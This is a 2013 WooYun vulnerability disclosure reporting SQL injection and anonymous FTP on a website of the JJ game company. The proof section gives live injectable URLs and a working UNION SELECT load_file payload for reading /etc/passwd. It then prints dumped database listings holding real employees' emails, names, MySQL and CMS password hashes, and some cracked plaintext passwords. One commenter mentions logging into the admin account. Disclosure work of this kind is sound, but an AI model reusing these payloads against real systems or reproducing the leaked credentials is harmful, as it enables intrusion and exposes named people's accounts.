当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043464

漏洞标题:JJ游戏某站SQL注入可获取各种管理账号密码

相关厂商:竞技世界(北京)网络技术有限公司

漏洞作者: 浩天

提交时间:2013-11-22 17:13

修复时间:2014-01-06 17:13

公开时间:2014-01-06 17:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-22: 细节已通知厂商并且等待厂商处理中
2013-11-25: 厂商已经确认,细节仅向厂商公开
2013-12-05: 细节向核心白帽子及相关领域专家公开
2013-12-15: 细节向普通白帽子公开
2013-12-25: 细节向实习白帽子公开
2014-01-06: 细节向公众公开

简要描述:

起因:朋友公司被JJ收购了,朋友面临失业中...

详细说明:

起因:最近JJ收购了一家创业型公司,朋友(女,测试人员)就在被收购的这家公司,所以友情测试了一下JJ的一个网站,发现漏洞,本打算让她提交给相关负责人,就不网络公开了,可是在等待面试的过程中,没能见到相关负责人,就不了了之了,其实这是一种损失,所以提到wooyun了。
两个问题:
1、3399小游戏某2台服务器ftp匿名登录,应该是“竞技世界”的网站
详情:ftp: 118.186.69.53、52 anonymous
这个有内容传输编码的问题,应该可破吧
2、这个问题严重了:sql注入两枚,涉及37个数据库,应该有核心业务,可报各种管理账号、密码,包括mysql
话说:好多黑产高价收购棋牌游戏的数据库,可是我是好人,剑心证明

漏洞证明:

漏洞证明:
sql注入点两枚:
http://club.jj.cn/detail/announce.php?cid=2015850
http://club.jj.cn/detail/member_dynamic.php?cid=2015850
漏洞证明,读取系统文件:
http://club.jj.cn/detail/announce.php?cid=2015850%27%20union%20select%201,2,load_file%280x2F6574632F706173737764%29,4,5,6,7,8,9%20and%20%27x%27=%27x

sql注入.png


暂发现两处sql注入,涉及jj的37数据库,有核心业务吧,服务器未开启GPC,只要知道网站绝对路径,就可以拿到shell,时间匆忙,未进一步渗透,友情测试,未作任何更改:
available databases [37]:
[*] AdminSys
[*] AttrSys
[*] BackupDatabase
[*] BugFree
[*] ClubDictSys
[*] ClubLogs
[*] ClubSys
[*] CommonDataSys
[*] CommunityBillSys
[*] CommunityContentSys
[*] CommunityDataCenter
[*] CommunityDataService
[*] CommunityDictSys
[*] CommunityGlobalSys
[*] CommunityGoodSys
[*] CommunityListSys
[*] CommunityMatchSys
[*] CommunityRelationSys
[*] CommunityReportSys
[*] CommunityScoreSys
[*] CommunityTopsSys
[*] DataAnalysis
[*] information_schema
[*] mysql
[*] performance_schema
[*] PhotoDataSys
[*] PhotoDataSys_bak
[*] phpcms
[*] RoarSys
[*] SearchDB
[*] SnsGames
[*] StarBBS
[*] TeamSys
[*] test
[*] UserCenter
[*] UserContentWords
[*] Wiki
Database: mysql
Table: user
[13 entries]
+-----------------+-------------+-------------------------------------------+
| host | user | password |
+-----------------+-------------+-------------------------------------------+
| localhost | root | *0DD305E7C0467844DD8356CD36333209539D27CD |
| 192.168.132.98 | cacti | *3AC033D7F9964FA5F0B2111D0278E1753CA60CEC |
| % | ClubDbAdmin | *FC3E2CAFDAB7E18D00FD9536B907CDA488F45260 |
| % | baocj | *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 |
| 192.168.134.253 | monitor | *1975D095AC033CAF4E1BF94F7202A9BBFEEB66F1 |123123
| localhost | backuper | *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 |
| 192.168.17.% | yanzk | *94F462F1E62075FAEAE58511DD6383AD377B23EE |
| 192.168.17.% | lixl | *4C1FDDFCBBFB0E223CF02CF5D951FE02BE1F27C0 |
| 192.168.17.% | zhaolei | *25391ADD310267F3FE65D8F1DDE803D71FD5646B |
| 192.168.17.% | liufz | *B11CAE865A4CD2599C2751E31C70ED95E0A49F3A |
| 192.168.17.% | shidb | *512BB86A15947F03581AD4AE50EE9F4127C83884 |
| 192.168.17.% | wangyang | *810BEBC09EC417AB7EE4349B0186BCBD949A70D9 |
| 192.168.% | zhaoyn | *F353F64BD568E23CE64A4FD7E620F688552EFFF0 |123123
+-----------------+-------------+-------------------------------------------+
Database: UserCenter
[12 tables]
+----------------------------+
| AnalysUserNickRecord |
| DataDynamicTypes |
| DataDynamics |
| DataDynamicsHistory_201308 |
| DataDynamicsHistory_201309 |
| DataOnLineUserList |
| DataPraises |
| DataPraisesHistory_201308 |
| DataVipUserList |
| SellOneselfLetters |
| UserPrimaryInfo |
| UserPrimaryInfoBak |
+----------------------------+
Database: phpcms
Table: v9_admin
[11 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| card | varchar(255) |
| email | varchar(40) |
| encrypt | varchar(6) |
| lang | varchar(6) |
| lastloginip | varchar(15) |
| lastlogintime | int(10) unsigned |
| password | varchar(32) |
| realname | varchar(50) |
| roleid | smallint(5) |
| userid | mediumint(6) unsigned |
| username | varchar(20) |
+---------------+-----------------------+
Database: phpcms
Table: v9_admin
[5 entries]
+--------+--------+---------+---------------------+----------+----------+----------------------------------+
| roleid | userid | card | email | username | realname | password |
+--------+--------+---------+---------------------+----------+----------+----------------------------------+
| 1 | 1 | <blank> | 13488804050@163.com | phpcms | <blank> | b40c67f92dcb7ba6da827af048398714 |
| 5 | 2 | <blank> | 2207185236@qq.com | weijie | ?? | 0f4b48f29b3a488f5da2afeb048ae021 |
| 5 | 3 | <blank> | 2207185236@qq.com | hanhua | <blank> | c567df845de0ca9b8c24105efcf902a3 |
| 5 | 4 | <blank> | marui@jjmatch.com | marui | <blank> | 0abd092e17104688105420f2363aa403 |
| 4 | 5 | <blank> | shengrh@jjmatch.com | shengrh | ??? | 17d4ba1c735c50e9525d52ae2712e860 |
+--------+--------+---------+---------------------+----------+----------+----------------------------------+
Database: phpcms
Table: v9_sso_admin
[1 entry]
+----+---------+----------+----------------------------------+
| id | issuper | username | password |
+----+---------+----------+----------------------------------+
| 1 | 1 | phpcms | 85b254744832ea019c9a90ae6005678e |
+----+---------+----------+----------------------------------+
Database: phpcms
Table: v9_member
[24 columns]
+-------------+-----------------------+
| Column | Type |
+-------------+-----------------------+
| amount | decimal(8,2) unsigned |
| areaid | smallint(5) unsigned |
| connectid | char(35) |
| email | char(32) |
| encrypt | char(6) |
| from | char(10) |
| groupid | tinyint(3) unsigned |
| islock | tinyint(1) unsigned |
| lastdate | int(10) unsigned |
| lastip | char(15) |
| loginnum | smallint(5) unsigned |
| message | tinyint(1) unsigned |
| modelid | smallint(5) unsigned |
| nickname | char(20) |
| overduedate | int(10) unsigned |
| password | char(32) |
| phpssouid | mediumint(8) unsigned |
| point | smallint(5) unsigned |
| regdate | int(10) unsigned |
| regip | char(15) |
| siteid | smallint(5) unsigned |
| userid | mediumint(8) unsigned |
| username | char(20) |
| vip | tinyint(1) unsigned |
+-------------+-----------------------+
Database: Wiki
Table: user
[10 entries]
+---------+------------+------------------------+----------------------------------------------+
| user_id | user_name | user_email | user_password |
+---------+------------+------------------------+----------------------------------------------+
| 1 | Zhaoyn | zhaoyn@jjmatch.com | :B:38b5a3ed:4caefc277b820ec6381cf72306ca38c9 |
| 2 | Jizc | <blank> | :B:be8b8283:3025ecec06d1dc1f24578361d562f7a4 |
| 3 | Weijie | weijie@jjmatch.com | :B:7e94207c:a68cea72823ba9424a0e9b1695744a36 |
| 4 | ?? | wangyang01@jjmatch.com | :B:f8c4179b:5090a260ce4d9e974c6c4a1620e58fc5 |
| 5 | Hellolulu | 270977099@qq.com | :B:bb30c797:2c64cd0bc3f6a81b866a75f5c0db6c7b |
| 6 | Yanzk | basename@sina.cn | :B:e7d8c746:2afcd32ad64c0dc5db4f2cc029ad52e6 |
| 7 | Liufz | liufz@jjmatch.com | :B:7105e0d9:d13f778054dd6c2e6af7ce9a4b8e0a98 |
| 8 | Wangyang01 | 13488804050@163.com | :B:611782fc:8cd2f46f0cb86500b0559e551f0b9bb7 |
| 9 | Luxg | luxg@jjmatch.com | :B:208be9f8:965f97cd440a9b7d7949612b0b9ff5ca |
| 10 | Li829527 | lixl@jjmatch.com | :B:1e85e14c:a5259d7888bad58f02d4b789162b7ba7 |
+---------+------------+------------------------+----------------------------------------------+
bugfree:
email realname password username id
Closed Closed Closed -2
Active Active Active -1
e10adc3949ba59abbe56e057f20f883e admin 1 123456
chenqian@jjmatch.com 陈茜 b322e86e0e2f940bcb36a4b0226c86a5 chenqian 33 cq123
chenyue@jjmatch.com 陈月 e10adc3949ba59abbe56e057f20f883e chenyue 22 123456
chenzm@jjmatch.com e10adc3949ba59abbe56e057f20f883e chenzm 8
hanhua@jjmatch.com 韩华 e10adc3949ba59abbe56e057f20f883e hanhua 11
huhl@jjmatch.com e10adc3949ba59abbe56e057f20f883e huhl 6
jiangcz@jjmatch.com e10adc3949ba59abbe56e057f20f883e jiangcz 15
jizc@jjmatch.com e10adc3949ba59abbe56e057f20f883e jizc 26
liufz@jjmatch.com 2698fa2307d4e4d695d6aac97eac2ddb liufz 31
liujie3@jjmatch.com 刘杰 e10adc3949ba59abbe56e057f20f883e liujie 16
liuxu@jjmatch.com 柳絮 e10adc3949ba59abbe56e057f20f883e liuxu 12
lixl@jjmatch.com c49e68c880c1e6ef88f2082fdab6727e lixl 29
lixy@jjmatch.com e10adc3949ba59abbe56e057f20f883e lixy 9
luojj@jjmatch.com e10adc3949ba59abbe56e057f20f883e luojj 23
luxg@jjmatch.com 8ef0f58f2a840a61baa9073c9ce2412c luxg 30
luxt@jjmatch.com e10adc3949ba59abbe56e057f20f883e luxt 32
qinlk@jjmatch.com e10adc3949ba59abbe56e057f20f883e qinlk 27
renfei01@jjmatch.com 任菲 e10adc3949ba59abbe56e057f20f883e renfei 25
sunyang@jjmatch.com 孙阳 e10adc3949ba59abbe56e057f20f883e sunyang 17
tanll@jjmatch.com e10adc3949ba59abbe56e057f20f883e tianll 5
wangyang01@jjmatch.com 王洋 e10adc3949ba59abbe56e057f20f883e wangyang 3
wangzc@jjmatch.com e10adc3949ba59abbe56e057f20f883e wangzc 13
weijie@jjmatch.com 魏杰 e10adc3949ba59abbe56e057f20f883e weijie 2
xujia@jjmatch.com 徐佳 e10adc3949ba59abbe56e057f20f883e xujia 14
yangcheng@jjmatch.com 杨成 e10adc3949ba59abbe56e057f20f883e yangchen 19
yanzk@jjmatch.com ce7344f48c132c2a2e8742c53821b4f6 yanzk 28
yuanlf@jjmatch.com e10adc3949ba59abbe56e057f20f883e yuanlf 20
zhangxu01@jjmatch.com 张旭 f52f7720f135c6a848fae08d507914cf zhangxu 24
zhaoyn@jjmatch.com 60e9ffdf0f41e4518a8a8606f6e27f7d zhaoyn 4
zhaoyw@jjmatch.com e10adc3949ba59abbe56e057f20f883e zhaoyw 18
zhongxue@jjmatch.com 仲雪 e10adc3949ba59abbe56e057f20f883e zhongxue 10
zhouxb@jjmatch.com e10adc3949ba59abbe56e057f20f883e zhouxb 21
zhuzf@jjmatch.com e10adc3949ba59abbe56e057f20f883e zhuzf 7
话说网站绝对路径已获取:
/admin/test.php 测试文件泄露网站绝对路径:
??? int(4) object(iLogs)#2 (4) { ["strComputerName":protected]=> NULL ["intType":protected]=> NULL ["objSocket":protected]=> NULL ["strOS":protected]=> string(5) "Linux" } array(3) { ["File"]=> string(44) "/data/WebSites/ClubSys/Ver6.3/admin/test.php" ["Line"]=> int(13) ["test"]=> string(4) "test" } NULL
就不深入测试了,没传shell,任何其他入侵行为与本人无关,纯友情测试,偶尔也玩JJ棋牌

修复方案:

找网站开发修,他们应该懂。
作为游戏类互联网公司,安全应该首当其冲,乌云是一个非常好的平台,他能很快的帮助厂商定位安全问题,望厂商重视,如果忽略的话,会很快公开吧!!
会继续关注,有洞会再通知!!

版权声明:转载请注明来源 浩天@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-11-25 10:12

厂商回复:

漏洞已确认,此网站的业务会受到影响

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-22 19:02 | Fakehac ( 路人 | Rank:12 漏洞数:1 | 菜鸟刚来,努力挖洞洞。。。)

    这个理由,够义气,顺便把站也给端了吧。

  2. 2013-11-22 19:06 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    哎,我的小伙伴已经被离职了

  3. 2013-11-22 19:07 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    怎么不认领

  4. 2013-11-22 20:34 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    全都修完了,不认领,会受到万千白帽子的鄙视

  5. 2013-11-22 23:57 | darkrerror ( 普通白帽子 | Rank:263 漏洞数:44 )

    @浩天 不是吧,我刚也发现了sql注入,正要登陆管理员账号呢

  6. 2013-11-25 09:52 | 竞技世界(北京)网络技术有限公司(乌云厂商)

    @浩天 已认领了呀

  7. 2013-11-25 09:54 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @竞技世界(北京)网络技术有限公司 没给rank值